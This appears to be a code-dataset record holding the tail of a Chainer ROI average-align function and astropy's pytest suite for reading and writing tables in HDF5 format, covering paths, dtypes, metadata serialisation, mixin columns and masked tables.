bottom_diff_offset + y_high * width + x_low], g3);
}
if (w4 > 0 && y_high <= height - 1 &&
x_high <= width - 1) {
T g4 = top_diff_this_bin * w4 / count;
atomicAdd(&bottom_diff[
bottom_diff_offset + y_high * width + x_high], g4);
}
// }}
}
}
''',
'roi_average_align_2d_bwd',
preamble=_GET_BILINEAR_INTERP_KERNEL,
)(gy[0], bottom_rois.shape[0],
self.spatial_scale, channels, height, width, self.outh, self.outw,
sampling_ratio_h, sampling_ratio_w, bottom_rois, bottom_roi_indices,
bottom_diff, size=gy[0].size)
return bottom_diff, None, None
def roi_average_align_2d(
x, rois, roi_indices, outsize, spatial_scale, sampling_ratio=None
):
"""Spatial Region of Interest (ROI) average align function.
This function acts similarly to
:func:`~chainer.functions.roi_average_pooling_2d`, but it computes average
of input spatial patch with bilinear interpolation for each channel with
the region of interest.
Args:
x (~chainer.Variable): Input variable. The shape is expected to be
4 dimensional: ``(n: batch, c: channel, h, height, w: width)``.
rois (~chainer.Variable): Input roi variable. The shape is expected to
be ``(n: data size, 4)``, and each datum is set as below:
``(y_min, x_min, y_max, x_max)``.
roi_indices (~chainer.Variable): Input roi variable. The shape is
expected to be ``(n: data size, )``.
outsize ((int, int) or int): Expected output size after pooled
(height, width). ``outsize=o`` and ``outsize=(o, o)``
are equivalent.
spatial_scale (float): Scale of the roi is resized.
sampling_ratio ((int, int) or int): Sampling step for the alignment.
It must be an integer over :math:`1` or :obj:`None`, and the value
is automatically decided when :obj:`None` is passed. Use of
different ratio in height and width axis is also supported by
passing tuple of int as ``(sampling_ratio_h, sampling_ratio_w)``.
``sampling_ratio=s`` and ``sampling_ratio=(s, s)`` are equivalent.
Returns:
~chainer.Variable: Output variable.
See the original paper proposing ROIAlign:
`Mask R-CNN <https://arxiv.org/abs/1703.06870>`_.
"""
return ROIAverageAlign2D(outsize, spatial_scale, sampling_ratio)(
x, rois, roi_indices)
| mit |
mhvk/astropy | astropy/io/misc/tests/test_hdf5.py | 2 | 31266 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
import pytest
import numpy as np
from astropy.table import Table, QTable, NdarrayMixin, Column
from astropy.table.table_helpers import simple_table
from astropy import units as u
from astropy.coordinates import (SkyCoord, Latitude, Longitude, Angle, EarthLocation,
SphericalRepresentation, CartesianRepresentation,
SphericalCosLatDifferential)
from astropy.time import Time, TimeDelta
from astropy.units import allclose as quantity_allclose
from astropy.units.quantity import QuantityInfo
from astropy.utils.exceptions import AstropyUserWarning
from astropy.utils.data import get_pkg_data_filename
from astropy.io.misc.hdf5 import meta_path
from astropy.utils.compat.optional_deps import HAS_H5PY # noqa
if HAS_H5PY:
import h5py
ALL_DTYPES = [np.uint8, np.uint16, np.uint32, np.uint64, np.int8,
np.int16, np.int32, np.int64, np.float32, np.float64,
np.bool_, '|S3']
def _default_values(dtype):
if dtype == np.bool_:
return [0, 1, 1]
elif dtype == '|S3':
return [b'abc', b'def', b'ghi']
else:
return [1, 2, 3]
@pytest.mark.skipif('not HAS_H5PY')
def test_write_nopath(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
with pytest.warns(UserWarning, match="table path was not set via the path= argument"):
t1.write(test_file)
t1 = Table.read(test_file, path='__astropy_table__')
@pytest.mark.skipif('not HAS_H5PY')
def test_write_nopath_nonempty(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path='bubu')
with pytest.raises(ValueError) as exc:
t1.write(test_file, append=True)
assert 'table path should always be set via the path=' in exc.value.args[0]
@pytest.mark.skipif('not HAS_H5PY')
def test_read_notable_nopath(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
h5py.File(test_file, 'w').close() # create empty file
with pytest.raises(ValueError, match='no table found in HDF5 group /'):
Table.read(test_file, path='/', format='hdf5')
@pytest.mark.skipif('not HAS_H5PY')
def test_read_nopath(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path="the_table")
t2 = Table.read(test_file)
assert np.all(t1['a'] == t2['a'])
@pytest.mark.skipif('not HAS_H5PY')
def test_read_nopath_multi_tables(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path="the_table")
t1.write(test_file, path="the_table_but_different", append=True,
overwrite=True)
with pytest.warns(AstropyUserWarning,
match=r"path= was not specified but multiple tables"):
t2 = Table.read(test_file)
assert np.all(t1['a'] == t2['a'])
@pytest.mark.skipif('not HAS_H5PY')
def test_write_invalid_path(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
with pytest.raises(ValueError) as exc:
t1.write(test_file, path='test/')
assert exc.value.args[0] == "table path should end with table name, not /"
@pytest.mark.skipif('not HAS_H5PY')
def test_read_invalid_path(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path='the_table')
with pytest.raises(OSError) as exc:
Table.read(test_file, path='test/')
assert exc.value.args[0] == "Path test/ does not exist"
@pytest.mark.skipif('not HAS_H5PY')
def test_read_missing_group(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
h5py.File(test_file, 'w').close() # create empty file
with pytest.raises(OSError) as exc:
Table.read(test_file, path='test/path/table')
assert exc.value.args[0] == "Path test/path/table does not exist"
@pytest.mark.skipif('not HAS_H5PY')
def test_read_missing_table(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
with h5py.File(test_file, 'w') as f:
f.create_group('test').create_group('path')
with pytest.raises(OSError) as exc:
Table.read(test_file, path='test/path/table')
assert exc.value.args[0] == "Path test/path/table does not exist"
@pytest.mark.skipif('not HAS_H5PY')
def test_read_missing_group_fileobj(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
with h5py.File(test_file, 'w') as f:
with pytest.raises(OSError) as exc:
Table.read(f, path='test/path/table')
assert exc.value.args[0] == "Path test/path/table does not exist"
@pytest.mark.skipif('not HAS_H5PY')
def test_read_write_simple(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path='the_table')
t2 = Table.read(test_file, path='the_table')
assert np.all(t2['a'] == [1, 2, 3])
@pytest.mark.skipif('not HAS_H5PY')
def test_read_write_existing_table(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path='the_table')
with pytest.raises(OSError) as exc:
t1.write(test_file, path='the_table', append=True)
assert exc.value.args[0] == "Table the_table already exists"
@pytest.mark.skipif('not HAS_H5PY')
def test_read_write_memory(tmpdir):
with h5py.File('test', 'w', driver='core', backing_store=False) as output_file:
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(output_file, path='the_table')
t2 = Table.read(output_file, path='the_table')
assert np.all(t2['a'] == [1, 2, 3])
@pytest.mark.skipif('not HAS_H5PY')
def test_read_write_existing(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
h5py.File(test_file, 'w').close() # create empty file
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
with pytest.raises(OSError) as exc:
t1.write(test_file, path='the_table')
assert exc.value.args[0].startswith("File exists:")
@pytest.mark.skipif('not HAS_H5PY')
def test_read_write_existing_overwrite(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
h5py.File(test_file, 'w').close() # create empty file
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path='the_table', overwrite=True)
t2 = Table.read(test_file, path='the_table')
assert np.all(t2['a'] == [1, 2, 3])
@pytest.mark.skipif('not HAS_H5PY')
def test_read_write_existing_append(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
h5py.File(test_file, 'w').close() # create empty file
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path='the_table_1', append=True)
t1.write(test_file, path='the_table_2', append=True)
t2 = Table.read(test_file, path='the_table_1')
assert np.all(t2['a'] == [1, 2, 3])
t3 = Table.read(test_file, path='the_table_2')
assert np.all(t3['a'] == [1, 2, 3])
@pytest.mark.skipif('not HAS_H5PY')
def test_read_write_existing_append_groups(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
with h5py.File(test_file, 'w') as f:
f.create_group('test_1')
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path='test_1/the_table_1', append=True)
t1.write(test_file, path='test_2/the_table_2', append=True)
t2 = Table.read(test_file, path='test_1/the_table_1')
assert np.all(t2['a'] == [1, 2, 3])
t3 = Table.read(test_file, path='test_2/the_table_2')
assert np.all(t3['a'] == [1, 2, 3])
@pytest.mark.skipif('not HAS_H5PY')
def test_read_write_existing_append_overwrite(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path='table1')
t1.write(test_file, path='table2', append=True)
t1v2 = Table()
t1v2.add_column(Column(name='a', data=[4, 5, 6]))
with pytest.raises(OSError) as exc:
t1v2.write(test_file, path='table1', append=True)
assert exc.value.args[0] == 'Table table1 already exists'
t1v2.write(test_file, path='table1', append=True, overwrite=True)
t2 = Table.read(test_file, path='table1')
assert np.all(t2['a'] == [4, 5, 6])
t3 = Table.read(test_file, path='table2')
assert np.all(t3['a'] == [1, 2, 3])
@pytest.mark.skipif('not HAS_H5PY')
def test_read_fileobj(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path='the_table')
import h5py
with h5py.File(test_file, 'r') as input_file:
t2 = Table.read(input_file, path='the_table')
assert np.all(t2['a'] == [1, 2, 3])
@pytest.mark.skipif('not HAS_H5PY')
def test_read_filobj_path(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path='path/to/data/the_table')
import h5py
with h5py.File(test_file, 'r') as input_file:
t2 = Table.read(input_file, path='path/to/data/the_table')
assert np.all(t2['a'] == [1, 2, 3])
@pytest.mark.skipif('not HAS_H5PY')
def test_read_filobj_group_path(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path='path/to/data/the_table')
import h5py
with h5py.File(test_file, 'r') as input_file:
t2 = Table.read(input_file['path/to'], path='data/the_table')
assert np.all(t2['a'] == [1, 2, 3])
@pytest.mark.skipif('not HAS_H5PY')
def test_read_wrong_fileobj():
class FakeFile:
def read(self):
pass
f = FakeFile()
with pytest.raises(TypeError, match='h5py can only open regular files'):
Table.read(f, format='hdf5')
@pytest.mark.skipif('not HAS_H5PY')
def test_write_fileobj(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
import h5py
with h5py.File(test_file, 'w') as output_file:
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(output_file, path='the_table')
t2 = Table.read(test_file, path='the_table')
assert np.all(t2['a'] == [1, 2, 3])
@pytest.mark.skipif('not HAS_H5PY')
def test_write_create_dataset_kwargs(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
the_path = 'the_table'
import h5py
with h5py.File(test_file, 'w') as output_file:
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(output_file, path=the_path,
maxshape=(None, ))
# A roundabout way of checking this, but the table created above should be
# resizable if the kwarg was passed through successfully
t2 = Table()
t2.add_column(Column(name='a', data=[4, 5]))
with h5py.File(test_file, 'a') as output_file:
output_file[the_path].resize((len(t1) + len(t2), ))
output_file[the_path][len(t1):] = t2.as_array()
t3 = Table.read(test_file, path='the_table')
assert np.all(t3['a'] == [1, 2, 3, 4, 5])
@pytest.mark.skipif('not HAS_H5PY')
def test_write_filobj_group(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
import h5py
with h5py.File(test_file, 'w') as output_file:
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(output_file, path='path/to/data/the_table')
t2 = Table.read(test_file, path='path/to/data/the_table')
assert np.all(t2['a'] == [1, 2, 3])
@pytest.mark.skipif('not HAS_H5PY')
def test_write_wrong_type():
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
with pytest.raises(TypeError) as exc:
t1.write(1212, path='path/to/data/the_table', format='hdf5')
assert exc.value.args[0] == ('output should be a string '
'or an h5py File or Group object')
@pytest.mark.skipif('not HAS_H5PY')
@pytest.mark.parametrize(('dtype'), ALL_DTYPES)
def test_preserve_single_dtypes(tmpdir, dtype):
test_file = str(tmpdir.join('test.hdf5'))
values = _default_values(dtype)
t1 = Table()
t1.add_column(Column(name='a', data=np.array(values, dtype=dtype)))
t1.write(test_file, path='the_table')
t2 = Table.read(test_file, path='the_table')
assert np.all(t2['a'] == values)
assert t2['a'].dtype == dtype
@pytest.mark.skipif('not HAS_H5PY')
def test_preserve_all_dtypes(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
for dtype in ALL_DTYPES:
values = _default_values(dtype)
t1.add_column(Column(name=str(dtype), data=np.array(values, dtype=dtype)))
t1.write(test_file, path='the_table')
t2 = Table.read(test_file, path='the_table')
for dtype in ALL_DTYPES:
values = _default_values(dtype)
assert np.all(t2[str(dtype)] == values)
assert t2[str(dtype)].dtype == dtype
@pytest.mark.skipif('not HAS_H5PY')
def test_preserve_meta(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.meta['a'] = 1
t1.meta['b'] = 'hello'
t1.meta['c'] = 3.14159
t1.meta['d'] = True
t1.meta['e'] = np.array([1, 2, 3])
t1.write(test_file, path='the_table')
t2 = Table.read(test_file, path='the_table')
for key in t1.meta:
assert np.all(t1.meta[key] == t2.meta[key])
@pytest.mark.skipif('not HAS_H5PY')
def test_preserve_serialized(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1['a'] = Column(data=[1, 2, 3], unit="s")
t1['a'].meta['a0'] = "A0"
t1['a'].meta['a1'] = {"a1": [0, 1]}
t1['a'].format = '7.3f'
t1['a'].description = 'A column'
t1.meta['b'] = 1
t1.meta['c'] = {"c0": [0, 1]}
t1.write(test_file, path='the_table', serialize_meta=True, overwrite=True)
t2 = Table.read(test_file, path='the_table')
assert t1['a'].unit == t2['a'].unit
assert t1['a'].format == t2['a'].format
assert t1['a'].description == t2['a'].description
assert t1['a'].meta == t2['a'].meta
assert t1.meta == t2.meta
# Check that the meta table is fixed-width bytes (see #11299)
h5 = h5py.File(test_file, 'r')
meta_lines = h5[meta_path('the_table')]
assert meta_lines.dtype.kind == 'S'
@pytest.mark.skipif('not HAS_H5PY')
def test_preserve_serialized_old_meta_format(tmpdir):
"""Test the old meta format
Only for some files created prior to v4.0, in compatibility mode.
"""
test_file = get_pkg_data_filename('data/old_meta_example.hdf5')
t1 = Table()
t1['a'] = Column(data=[1, 2, 3], unit="s")
t1['a'].meta['a0'] = "A0"
t1['a'].meta['a1'] = {"a1": [0, 1]}
t1['a'].format = '7.3f'
t1['a'].description = 'A column'
t1.meta['b'] = 1
t1.meta['c'] = {"c0": [0, 1]}
t2 = Table.read(test_file, path='the_table')
assert t1['a'].unit == t2['a'].unit
assert t1['a'].format == t2['a'].format
assert t1['a'].description == t2['a'].description
assert t1['a'].meta == t2['a'].meta
assert t1.meta == t2.meta
@pytest.mark.skipif('not HAS_H5PY')
def test_preserve_serialized_in_complicated_path(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1['a'] = Column(data=[1, 2, 3], unit="s")
t1['a'].meta['a0'] = "A0"
t1['a'].meta['a1'] = {"a1": [0, 1]}
t1['a'].format = '7.3f'
t1['a'].description = 'A column'
t1.meta['b'] = 1
t1.meta['c'] = {"c0": [0, 1]}
t1.write(test_file, path='the_table/complicated/path', serialize_meta=True,
overwrite=True)
t2 = Table.read(test_file, path='the_table/complicated/path')
assert t1['a'].format == t2['a'].format
assert t1['a'].unit == t2['a'].unit
assert t1['a'].description == t2['a'].description
assert t1['a'].meta == t2['a'].meta
assert t1.meta == t2.meta
@pytest.mark.skipif('not HAS_H5PY')
def test_metadata_very_large(tmpdir):
"""Test that very large datasets work, now!"""
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1['a'] = Column(data=[1, 2, 3], unit="s")
t1['a'].meta['a0'] = "A0"
t1['a'].meta['a1'] = {"a1": [0, 1]}
t1['a'].format = '7.3f'
t1['a'].description = 'A column'
t1.meta['b'] = 1
t1.meta['c'] = {"c0": [0, 1]}
t1.meta["meta_big"] = "0" * (2 ** 16 + 1)
t1.meta["meta_biggerstill"] = "0" * (2 ** 18)
t1.write(test_file, path='the_table', serialize_meta=True, overwrite=True)
t2 = Table.read(test_file, path='the_table')
assert t1['a'].unit == t2['a'].unit
assert t1['a'].format == t2['a'].format
assert t1['a'].description == t2['a'].description
assert t1['a'].meta == t2['a'].meta
assert t1.meta == t2.meta
@pytest.mark.skipif('not HAS_H5PY')
def test_skip_meta(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.meta['a'] = 1
t1.meta['b'] = 'hello'
t1.meta['c'] = 3.14159
t1.meta['d'] = True
t1.meta['e'] = np.array([1, 2, 3])
t1.meta['f'] = str
wtext = f"Attribute `f` of type {type(t1.meta['f'])} cannot be written to HDF5 files - skipping"
with pytest.warns(AstropyUserWarning, match=wtext) as w:
t1.write(test_file, path='the_table')
assert len(w) == 1
@pytest.mark.skipif('not HAS_H5PY')
def test_fail_meta_serialize(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.meta['f'] = str
with pytest.raises(Exception) as err:
t1.write(test_file, path='the_table', serialize_meta=True)
assert "cannot represent an object" in str(err.value)
assert "<class 'str'>" in str(err.value)
@pytest.mark.skipif('not HAS_H5PY')
def test_read_h5py_objects(tmpdir):
# Regression test - ensure that Datasets are recognized automatically
test_file = str(tmpdir.join('test.hdf5'))
import h5py
with h5py.File(test_file, 'w') as output_file:
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(output_file, path='the_table')
f = h5py.File(test_file, mode='r')
t2 = Table.read(f, path='the_table')
assert np.all(t2['a'] == [1, 2, 3])
t3 = Table.read(f['/'], path='the_table')
assert np.all(t3['a'] == [1, 2, 3])
t4 = Table.read(f['the_table'])
assert np.all(t4['a'] == [1, 2, 3])
f.close() # don't raise an error in 'test --open-files'
@pytest.mark.skipif('not HAS_H5PY')
def test_read_write_unicode_to_hdf5(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t = Table()
t['p'] = ['a', 'b', 'c']
t['q'] = [1, 2, 3]
t['r'] = [b'a', b'b', b'c']
t['s'] = ["\u2119", "\u01b4", "\u2602"]
t.write(test_file, path='the_table', overwrite=True)
t1 = Table.read(test_file, path='the_table', character_as_bytes=False)
for col, col1 in zip(t.itercols(), t1.itercols()):
assert np.all(col == col1)
assert np.all(t1['p'].info.dtype.kind == "U")
assert np.all(t1['q'].info.dtype.kind == "i")
assert np.all(t1['r'].info.dtype.kind == "U")
assert np.all(t1['s'].info.dtype.kind == "U")
# Test default (character_as_bytes=True)
t2 = Table.read(test_file, path='the_table')
for col, col1 in zip(t.itercols(), t2.itercols()):
assert np.all(col == col1)
assert np.all(t2['p'].info.dtype.kind == "S")
assert np.all(t2['q'].info.dtype.kind == "i")
assert np.all(t2['r'].info.dtype.kind == "S")
assert np.all(t2['s'].info.dtype.kind == "S")
def assert_objects_equal(obj1, obj2, attrs, compare_class=True):
if compare_class:
assert obj1.__class__ is obj2.__class__
info_attrs = ['info.name', 'info.format', 'info.unit', 'info.description', 'info.meta']
for attr in attrs + info_attrs:
a1 = obj1
a2 = obj2
for subattr in attr.split('.'):
try:
a1 = getattr(a1, subattr)
a2 = getattr(a2, subattr)
except AttributeError:
a1 = a1[subattr]
a2 = a2[subattr]
# Mixin info.meta can None instead of empty OrderedDict(), #6720 would
# fix this.
if attr == 'info.meta':
if a1 is None:
a1 = {}
if a2 is None:
a2 = {}
if isinstance(a1, np.ndarray) and a1.dtype.kind == 'f':
assert quantity_allclose(a1, a2, rtol=1e-15)
else:
assert np.all(a1 == a2)
# Testing HDF5 table read/write with mixins. This is mostly
# copied from FITS mixin testing, and it might be good to unify it.
# Analogous tests also exist for ECSV.
el = EarthLocation(x=1 * u.km, y=3 * u.km, z=5 * u.km)
el2 = EarthLocation(x=[1, 2] * u.km, y=[3, 4] * u.km, z=[5, 6] * u.km)
sr = SphericalRepresentation(
[0, 1]*u.deg, [2, 3]*u.deg, 1*u.kpc)
cr = CartesianRepresentation(
[0, 1]*u.pc, [4, 5]*u.pc, [8, 6]*u.pc)
sd = SphericalCosLatDifferential(
[0, 1]*u.mas/u.yr, [0, 1]*u.mas/u.yr, 10*u.km/u.s)
srd = SphericalRepresentation(sr, differentials=sd)
sc = SkyCoord([1, 2], [3, 4], unit='deg,deg', frame='fk4',
obstime='J1990.5')
scd = SkyCoord([1, 2], [3, 4], [5, 6], unit='deg,deg,m', frame='fk4',
obstime=['J1990.5', 'J1991.5'])
scdc = scd.copy()
scdc.representation_type = 'cartesian'
scpm = SkyCoord([1, 2], [3, 4], [5, 6], unit='deg,deg,pc',
pm_ra_cosdec=[7, 8]*u.mas/u.yr, pm_dec=[9, 10]*u.mas/u.yr)
scpmrv = SkyCoord([1, 2], [3, 4], [5, 6], unit='deg,deg,pc',
pm_ra_cosdec=[7, 8]*u.mas/u.yr, pm_dec=[9, 10]*u.mas/u.yr,
radial_velocity=[11, 12]*u.km/u.s)
scrv = SkyCoord([1, 2], [3, 4], [5, 6], unit='deg,deg,pc',
radial_velocity=[11, 12]*u.km/u.s)
tm = Time([2450814.5, 2450815.5], format='jd', scale='tai', location=el)
# NOTE: in the test below the name of the column "x" for the Quantity is
# important since it tests the fix for #10215 (namespace clash, where "x"
# clashes with "el2.x").
mixin_cols = {
'tm': tm,
'dt': TimeDelta([1, 2] * u.day),
'sc': sc,
'scd': scd,
'scdc': scdc,
'scpm': scpm,
'scpmrv': scpmrv,
'scrv': scrv,
'x': [1, 2] * u.m,
'qdb': [10, 20] * u.dB(u.mW),
'qdex': [4.5, 5.5] * u.dex(u.cm/u.s**2),
'qmag': [21, 22] * u.ABmag,
'lat': Latitude([1, 2] * u.deg),
'lon': Longitude([1, 2] * u.deg, wrap_angle=180. * u.deg),
'ang': Angle([1, 2] * u.deg),
'el2': el2,
'sr': sr,
'cr': cr,
'sd': sd,
'srd': srd,
}
time_attrs = ['value', 'shape', 'format', 'scale', 'location']
compare_attrs = {
'c1': ['data'],
'c2': ['data'],
'tm': time_attrs,
'dt': ['shape', 'value', 'format', 'scale'],
'sc': ['ra', 'dec', 'representation_type', 'frame.name'],
'scd': ['ra', 'dec', 'distance', 'representation_type', 'frame.name'],
'scdc': ['x', 'y', 'z', 'representation_type', 'frame.name'],
'scpm': ['ra', 'dec', 'distance', 'pm_ra_cosdec', 'pm_dec',
'representation_type', 'frame.name'],
'scpmrv': ['ra', 'dec', 'distance', 'pm_ra_cosdec', 'pm_dec',
'radial_velocity', 'representation_type', 'frame.name'],
'scrv': ['ra', 'dec', 'distance', 'radial_velocity', 'representation_type',
'frame.name'],
'x': ['value', 'unit'],
'qdb': ['value', 'unit'],
'qdex': ['value', 'unit'],
'qmag': ['value', 'unit'],
'lon': ['value', 'unit', 'wrap_angle'],
'lat': ['value', 'unit'],
'ang': ['value', 'unit'],
'el2': ['x', 'y', 'z', 'ellipsoid'],
'nd': ['x', 'y', 'z'],
'sr': ['lon', 'lat', 'distance'],
'cr': ['x', 'y', 'z'],
'sd': ['d_lon_coslat', 'd_lat', 'd_distance'],
'srd': ['lon', 'lat', 'distance', 'differentials.s.d_lon_coslat',
'differentials.s.d_lat', 'differentials.s.d_distance'],
}
@pytest.mark.skipif('not HAS_H5PY')
def test_hdf5_mixins_qtable_to_table(tmpdir):
"""Test writing as QTable and reading as Table. Ensure correct classes
come out.
"""
filename = str(tmpdir.join('test_simple.hdf5'))
names = sorted(mixin_cols)
t = QTable([mixin_cols[name] for name in names], names=names)
t.write(filename, format='hdf5', path='root', serialize_meta=True)
t2 = Table.read(filename, format='hdf5', path='root')
assert t.colnames == t2.colnames
for name, col in t.columns.items():
col2 = t2[name]
# Special-case Time, which does not yet support round-tripping
# the format.
if isinstance(col2, Time):
col2.format = col.format
attrs = compare_attrs[name]
compare_class = True
if isinstance(col.info, QuantityInfo):
# Downgrade Quantity to Column + unit
assert type(col2) is Column
# Class-specific attributes like `value` or `wrap_angle` are lost.
attrs = ['unit']
compare_class = False
# Compare data values here (assert_objects_equal doesn't know how in this case)
assert np.all(col.value == col2)
assert_objects_equal(col, col2, attrs, compare_class)
@pytest.mark.skipif('not HAS_H5PY')
@pytest.mark.parametrize('table_cls', (Table, QTable))
def test_hdf5_mixins_as_one(table_cls, tmpdir):
"""Test write/read all cols at once and validate intermediate column names"""
filename = str(tmpdir.join('test_simple.hdf5'))
names = sorted(mixin_cols)
serialized_names = ['ang',
'cr.x', 'cr.y', 'cr.z',
'dt.jd1', 'dt.jd2',
'el2.x', 'el2.y', 'el2.z',
'lat',
'lon',
'qdb',
'qdex',
'qmag',
'sc.ra', 'sc.dec',
'scd.ra', 'scd.dec', 'scd.distance',
'scd.obstime.jd1', 'scd.obstime.jd2',
'scdc.x', 'scdc.y', 'scdc.z',
'scdc.obstime.jd1', 'scdc.obstime.jd2',
'scpm.ra', 'scpm.dec', 'scpm.distance',
'scpm.pm_ra_cosdec', 'scpm.pm_dec',
'scpmrv.ra', 'scpmrv.dec', 'scpmrv.distance',
'scpmrv.pm_ra_cosdec', 'scpmrv.pm_dec',
'scpmrv.radial_velocity',
'scrv.ra', 'scrv.dec', 'scrv.distance',
'scrv.radial_velocity',
'sd.d_lon_coslat', 'sd.d_lat', 'sd.d_distance',
'sr.lon', 'sr.lat', 'sr.distance',
'srd.lon', 'srd.lat', 'srd.distance',
'srd.differentials.s.d_lon_coslat',
'srd.differentials.s.d_lat',
'srd.differentials.s.d_distance',
'tm.jd1', 'tm.jd2',
'x',
]
t = table_cls([mixin_cols[name] for name in names], names=names)
t.meta['C'] = 'spam'
t.meta['comments'] = ['this', 'is', 'a', 'comment']
t.meta['history'] = ['first', 'second', 'third']
t.write(filename, format="hdf5", path='root', serialize_meta=True)
t2 = table_cls.read(filename, format='hdf5', path='root')
assert t2.meta['C'] == 'spam'
assert t2.meta['comments'] == ['this', 'is', 'a', 'comment']
assert t2.meta['history'] == ['first', 'second', 'third']
assert t.colnames == t2.colnames
# Read directly via hdf5 and confirm column names
h5 = h5py.File(filename, 'r')
assert list(h5['root'].dtype.names) == serialized_names
h5.close()
@pytest.mark.skipif('not HAS_H5PY')
@pytest.mark.parametrize('name_col', list(mixin_cols.items()))
@pytest.mark.parametrize('table_cls', (Table, QTable))
def test_hdf5_mixins_per_column(table_cls, name_col, tmpdir):
"""Test write/read one col at a time and do detailed validation"""
filename = str(tmpdir.join('test_simple.hdf5'))
name, col = name_col
c = [1.0, 2.0]
t = table_cls([c, col, c], names=['c1', name, 'c2'])
t[name].info.description = 'my description'
t[name].info.meta = {'list': list(range(50)), 'dict': {'a': 'b' * 200}}
if not t.has_mixin_columns:
pytest.skip('column is not a mixin (e.g. Quantity subclass in Table)')
if isinstance(t[name], NdarrayMixin):
pytest.xfail('NdarrayMixin not supported')
t.write(filename, format="hdf5", path='root', serialize_meta=True)
t2 = table_cls.read(filename, format='hdf5', path='root')
assert t.colnames == t2.colnames
for colname in t.colnames:
assert_objects_equal(t[colname], t2[colname], compare_attrs[colname])
# Special case to make sure Column type doesn't leak into Time class data
if name.startswith('tm'):
assert t2[name]._time.jd1.__class__ is np.ndarray
assert t2[name]._time.jd2.__class__ is np.ndarray
@pytest.mark.skipif('not HAS_H5PY')
def test_round_trip_masked_table_default(tmpdir):
"""Test round-trip of MaskedColumn through HDF5 using default serialization
that writes a separate mask column. Note:
>>> simple_table(masked=True)
<Table masked=True length=3>
a b c
int64 float64 str1
----- ------- ----
-- 1.0 c
2 2.0 --
3 -- e
"""
filename = str(tmpdir.join('test.h5'))
t = simple_table(masked=True) # int, float, and str cols with one masked element
t['c'] = [b'c', b'd', b'e']
t['c'].mask[1] = True
t.write(filename, format='hdf5', path='root', serialize_meta=True)
t2 = Table.read(filename)
assert t2.masked is False
assert t2.colnames == t.colnames
for name in t2.colnames:
assert np.all(t2[name].mask == t[name].mask)
assert np.all(t2[name] == t[name])
# Data under the mask round-trips also (unmask data to show this).
t[name].mask = False
t2[name].mask = False
assert np.all(t2[name] == t[name])
@pytest.mark.skipif('not HAS_H5PY')
def test_overwrite_serialized_meta():
# This used to cause an error because the meta data table
# was not removed from the existing file.
with h5py.File('test_data.h5', 'w', driver='core', backing_store=False) as out:
t1 = Table()
t1.add_column(Column(data=[4, 8, 15], unit='cm'))
t1.write(out, path='data', serialize_meta=True)
t2 = Table.read(out, path='data')
assert all(t1 == t2)
assert t1.info(out=None) == t2.info(out=None)
t3 = Table()
t3.add_column(Column(data=[16, 23, 42], unit='g'))
t3.write(out, path='data', serialize_meta=True, append=True, overwrite=True)
t2 = Table.read(out, path='data')
assert all(t3 == t2)
